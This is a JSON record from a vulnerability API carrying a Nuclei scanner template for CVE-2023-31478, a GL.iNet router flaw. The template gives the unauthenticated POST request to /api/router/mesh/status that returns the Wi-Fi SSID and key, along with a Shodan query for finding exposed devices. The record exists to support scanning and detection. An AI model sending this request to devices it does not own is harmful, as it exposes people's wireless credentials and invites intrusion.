{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-31478/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-31478/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-31478/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-31478/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-31478/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-31478"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-31478"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-31478.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2023-31478\n\ninfo:\n  name: GL.iNET SSID Key Disclosure\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    An issue was discovered on GL.iNet devices before 3.216. An API endpoint reveals information about the Wi-Fi configuration, including the SSID and key.\n  impact: |\n    Unauthenticated attackers can retrieve Wi-Fi SSID and password information through the mesh status API endpoint, potentially allowing unauthorized access to the wireless network and intercepting network traffic.\n  remediation: |\n    Update GL.iNET firmware to version 3.216 or later that requires authentication for the /api/router/mesh/status endpoint and protects Wi-Fi credentials.\n  reference:\n    - https://www.gl-inet.com\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-31478\n    epss-score: 0.29699\n    epss-percentile: 0.98115\n    cpe: cpe:2.3:o:gl-inet:gl-s20_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    vendor: gl-inet\n    product: gl-s20_firmware\n    verified: true\n    max-request: 1\n    shodan-query: title:\"GL.iNet Admin Panel\"\n  tags: cve,cve2023,gl-inet,disclosure,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /api/router/mesh/status HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        mac=\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"ssid\":'\n          - '\"encryption\":'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402207b58201171561ccf3ae02abb38a32604e597887df2b53739a566d0ec17f8fe2b022078e1c0fd8b2073e278d0cfd60f2f78932492650fe2ea6102cb317ae760db17cc:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-31478"
}